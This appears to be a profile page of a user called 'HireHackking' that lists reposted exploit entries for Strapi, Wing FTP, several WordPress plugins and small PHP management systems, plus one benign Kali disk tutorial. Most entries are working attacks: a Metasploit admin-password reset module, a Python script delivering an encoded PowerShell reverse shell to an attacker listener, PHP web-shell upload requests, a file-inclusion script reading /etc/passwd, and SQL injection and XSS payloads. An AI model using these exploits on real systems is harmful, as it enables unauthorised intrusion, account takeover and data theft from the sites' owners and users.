Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)", 'Description' => %q{ This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user. }, 'License' => MSF_LICENSE, 'Author' => [ 'WackyH4cker' ], 'References' => [ [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ] ], 'Platform' => 'linux', 'Targets' => [ [ 'Strapi 3.0.0-beta-17.4', {} ] ], 'Payload' => '', 'Privileged' => true, 'DisclosureDate' => "", 'DefaultOptions' => { 'SSL' => 'False', 'RPORT' => 80, }, 'DefaultTarget' => 0 )) register_options [ OptString.new('NEW_PASSWORD', [true, 'New password for user Admin']) ] end def check res = send_request_raw({ 'uri' => '/admin/init' }) version = JSON.parse(res.body) if version["data"]["strapiVersion"] == '3.0.0-beta.17.4' return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def run json_body = { 'code' => {'$gt' => 0}, 'password' => datastore['NEW_PASSWORD'], 'passwordConfirmation' => datastore['NEW_PASSWORD'] } res = send_request_cgi({ 'method' => 'POST', 'uri' => '/admin/auth/reset-password', 'ctype' => 'application/json', 'data' => JSON.generate(json_body) }) print_status("Changing password...") json_format = JSON.parse(res.body) jwt = json_format['jwt'] if res.code == 200 print_good("Password changed successfully!") print_good("USER: admin") print_good("PASSWORD: #{datastore['NEW_PASSWORD']}") print_good("JWT: #{jwt}") else fail_with(Failure::NoAccess"Could not change admin user password") end end end
  2. HireHackking

    Hospital Management System 4.0 - 'multiple' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Title: Hospital Management System 4.0 - 'multiple' SQL Injection # Author: nu11secur1ty # Date: 02.06.2022 # Vendor: https://github.com/kishan0725 # Software: https://github.com/kishan0725/Hospital-Management-System # CVE-2022-24263 ## Description: The Hospital Management System v4.0 is suffering from Multiple SQL-Injections via three parameters in function.php, contact.php, and func3.php applications. The attacker can be receiving the all information from the system by using this vulnerability, and also the malicious actor can use sensitive information from the customers of this system. WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: --- Parameter: txtName (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtName=821761' AND (SELECT 9346 FROM (SELECT(SLEEP(3)))HJGv) AND 'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send Message&txtMsg=441931 --- ------------------------------------------- --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login --- ------------------------------------------- --- Parameter: #1* ((custom) POST) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login --- ## Reproduce: https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263
  3. HireHackking

    Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wing FTP Server - Authenticated RCE # Date: 02/06/2022 # Exploit Author: notcos # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes. # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download/WingFtpServer.exe # Version: <=4.3.8 # Tested on: Windows # !/usr/bin/python3 import requests import sys import base64 import urllib.parse # Get command line arguments if len(sys.argv) != 7: print("This exploit will invoke a nishang tcp reverse shell on the target. Start your listener before executing.") print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT> <USER> <PASSWORD>" % sys.argv[0]) print("Example: %s 0.0.0.0 8000 127.0.0.1 9001 notcos coolpass" % sys.argv[0]) exit(1) else: target = sys.argv[1] targetport = sys.argv[2] localip = sys.argv[3] localport = sys.argv[4] user = sys.argv[5] password = sys.argv[6] print(''' .--. / ,~a`-, \ \_.-"` ) ( __ __ .__ ____ __________ _________ ___________ ,/ ."\ / \ / \|__| ____ / ___\ \______ \\\\_ ___ \ \_ _____/ / ( | \ \/\/ /| | / \ / /_/ > | _// \ \/ | __)_ / ) ; \ / | || | \ \___ / | | \\\\ \____ | \\ / / / \__/\ / |__||___| //_____/ |____|_ / \______ //_______ / ,/_."` /` \/ \/ \/ \/ \/ /_/\ |___ `~~~~~` ''') # Create the login request url = 'http://' + target + ':' + targetport + '/admin_loginok.html' data = ('username=' + user + '&password=' + password + '&username_val=' + user + '&password_val=' + password + '&su' 'bmit_btn=%2bLogin%2b') headers = { "User-Agent": "Googlebot" } # Send the POST request to log in and save the cookie r = requests.post(url, headers=headers, data=data) cookie = 'UIDADMIN=' + r.cookies['UIDADMIN'] print('Login successful - Cookie: ' + cookie) url = "http://" + target + ":" + targetport + "/admin_lua_script.html" headers = { "User-Agent": "Googlebot", "Cookie": cookie, } # Base64 encode a nishang reverse tcp shell one liner and then url encode it nish = ("$client = New-Object System.Net.Sockets.TCPClient(\"" + localip + "\"," + localport + ");$stream = $client" ".GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$d" "ata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1" " | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCI" "I).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()") encodedStr = str(base64.b64encode(nish.encode('UTF-16LE')), "UTF8") urlpayload = urllib.parse.quote(encodedStr, safe='+') finalload = "command=os.execute('powershell -Encodedcommand " + urlpayload + "')" # Send the reverse shell payload try: r = requests.post(url, headers=headers, data=finalload, timeout=0.1) except requests.exceptions.ReadTimeout: print("The payload has been sent. Check your listener.") pass
  4. HireHackking

    WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS) # Date: 2022-02-04 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/ # Version: 1.2 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>
  5. HireHackking

    WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS) # Date: 2022-01-26 # Exploit Author: Shweta Mahajan # Vendor Homepage: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/ # Software Link: https://en-gb.wordpress.org/plugins/titan-labs-security-audit/ # Tested on Windows # CVE: CVE-2021-24901 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24901 https://wpscan.com/vulnerability/9c315404-b66a-448c-a3b7-367a37b53435 How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate Titan-labs-security-audit Version 1.0.0 3. Navigate to Security Audit settings >> enter the payload into 'Data Id'. 4. Enter JavaScript payload which is mentioned below "><img src=x onerror=confirm(1)> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
  6. HireHackking

    Title: Expand the disk for Kali Linux

    HireHackking posted a blog entry in Hacker Technology
    Before, when installing the system for Kali, 40G disks were allocated, but as more and more files are stored in Kali, kali's disk possession is no longer enough. So how to expand the kali disk? First, let’s take a look at the remaining space of this unit. df As you can see, disk ownership has accounted for 100%. Allocate space to kali Run the virtual machine settings, click Add below - Add Hard Drive Here I am adding 10G capacity Execute the following command in the terminal fdisk -l Here we see the 10G capacity hard disk we just added. Next we need to partition /dev/sda Execute the command fdisk /dev/sda Format partition mke2fs -t ext4 /dev/sda mount disk At this time, I want to mount the /root directory of 10G capacity Execute the command mount /dev/sda /root, but this can only be used once, that is, our mount will be lost after the PC is restarted, and we can set the configuration file Modify the configuration file The format is as follows: UUID=Mount directory File system format Permanent Whether to backup Whether to self-check UUID is available through blkid vim /etc/fstab In this way, we have completed the expansion of the disk
  7. HireHackking

    Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion # Date: 2022-02-06 # Exploit Author: Ven3xy # Vendor Homepage: https://wordpress.org/plugins/simple-job-board/ # Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip # Version: 2.9.3 # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2020-35749 import requests import sys import time class color: HEADER = '\033[95m' IMPORTANT = '\33[35m' NOTICE = '\033[33m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' END = '\033[0m' UNDERLINE = '\033[4m' LOGGING = '\33[34m' color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] def banner(): run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8 Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__ Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888 Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888 Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888 Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/ 888 888 \n''' run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n''' run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' print(run+run2+run3) if (len(sys.argv) != 5): banner() print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>") print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin") exit() else: banner() fetch_path = sys.argv[2] print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path) time.sleep(3) target_url = sys.argv[1] usernamex = sys.argv[3] passwordx = sys.argv[4] print("\n") login = target_url+"wp-login.php" wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path username = usernamex password = passwordx with requests.Session() as s: headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check', 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' } post_data={ 'log':username, 'pwd':password, 'wp-submit':'Log In','redirect_to':wp_path, 'testcookie':'1' } s.post(login, headers=headers, data=post_data) resp = s.get(wp_path) out_file = open("output.txt", "w") print(resp.text, file=out_file) out_file.close() print(color_random[4]+resp.text) out = color_random[5]+"\n[+] Output Saved as: output.txt\n" print(out)
  8. HireHackking

    Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-02-08 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: XAMPP, Kali Linux Description – The application suffers from a remote code execution in the admin panel. An authenticated attacker can upload a web-shell php file in profile page to achieve remote code execution. POC:- ========== # Request: ========== POST /erms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------37791356766765055891341961306 Content-Length: 1004 Origin: http://localhost Connection: close Referer: http://localhost/erms/admin/?page=user Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="id" 1 -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="lastname" Admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="username" admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="password" -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php <html> <body> <b>Remote code execution: </b><br><pre> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> </pre> </body> </html> -----------------------------37791356766765055891341961306— ================ # Webshell access: ================ # Webshell access via: POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id # Webshell response: Remote code execution: uid=1(daemon) gid=1(daemon) groups=1(daemon)
  9. HireHackking

    WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS) # Date: 2022-02-02 # Exploit Author: Shweta Mahajan # Vendor Homepage: https://wordpress.org/plugins/cp-blocks/ # Software Link: https://wordpress.org/plugins/cp-blocks/ # Tested on Windows # CVE: CVE-2022-0448 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0448 https://wpscan.com/vulnerability/d4ff63ee-28e6-486e-9aa7-c878b97f707c How to reproduce vulnerability: 1. Install Latest WordPress 2. Install and activate CP Blocks Version 1.0.14 3. Navigate to CP Blocks - License >> enter the payload into 'License ID'. 4. Enter JavaScript payload which is mentioned below "><script>alert(0)</script> 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
  10. HireHackking

    Cain & Abel 4.9.56 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path # Exploit Author: Aryan Chehreghani # Date: 2022-02-08 # Software Link: https://www.malavida.com/en/soft/cain-and-abel # Version: 4.9.56 # Tested on: Windows 10 x64 # PoC SERVICE_NAME: Abel TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Cain\Abel64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Abel DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  11. HireHackking

    AtomCMS v2.0 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AtomCMS v2.0 - SQLi # Date: 08/02/2022 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Version: v2.0 # Category: Webapps # Tested on: Debian linux # CVE : CVE-2022-24223 ==================================================== # PoC : SQLi : http://127.0.0.1/Atom.CMS/admin/login.php POST /Atom.CMS/admin/login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 35 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/Atom.CMS/admin/login.php Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email=test%40test.com&password=1234 Vulnerable Payload : Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=test@test.com' AND (SELECT 5613 FROM (SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: email=test@test.com' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- -&password=1234 Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- - --- ====================================================
  12. HireHackking

    Exam Reviewer Management System 1.0 - ‘id’ SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection # Date: 2022-02-18 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux Description – The ‘id’ parameter in Exam Reviewer Management System web application is vulnerable to SQL Injection Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1 POC:- --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND 'vqGg'='vqGg--- *SQLMAP COMMAND* *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1 <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
  13. HireHackking

    Hospital Management Startup 1.0 - 'Multiple' SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi # Exploit Author: nu11secur1ty # Date: 02.10.2022 # Vendor: https://github.com/kabirkhyrul # Software: https://github.com/kabirkhyrul/HMS # CVE-2022-23366 # Description: The loginid and password parameters from Hospital Management Startup 1.0 appear to be vulnerable to SQL injection attacks. The attacker can retrieve all information from the administrator account of the system and he can use the information for malicious purposes! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: ```mysql --- Parameter: loginid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND (SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND 'sDHP'='sDHP&rememberme=on&submit=Login --- ``` # Reproduce: https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366
  14. HireHackking

    Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Home Owners Collection Management System is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters #Steps to Reproduce 1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. 2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password ============================================== POST /hocms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391 Content-Length: 899 Origin: http://localhost Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="id" -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="firstname" hi -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="lastname" test -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="username" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="password" saud -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="type" 1 -----------------------------8012296389370411172619882391 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------8012296389370411172619882391--
  15. HireHackking

    Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Vulnerable Code line 68 in file "/hocms/admin/members/view_member.php" $collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc"); # Sqlmap command: sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch # Output: Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member
  16. HireHackking

    WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) # Date 08.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://ays-pro.com/ # Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip # Version: < 2.8.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24931 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md ''' Description: The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. ''' banner = ''' .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-. : .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' : : : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: : : :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : : `.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' :_; [+] Copy Content Protection and Content Locking - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
  17. HireHackking

    Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Request sent as base user POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215 Content-Length: 769 Origin: http://localhost Connection: close Referer: http://localhost/hocms/admin/?page=system_info Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="name" Home Owners Collection Management System' -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="short_name" HOCMS - PHP -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="cover"; filename="cmd.php" Content-Type: application/x-php <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------31935477191495174627236953215-- # Response HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:32:16 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju Upgrade-Insecure-Requests: 1 # 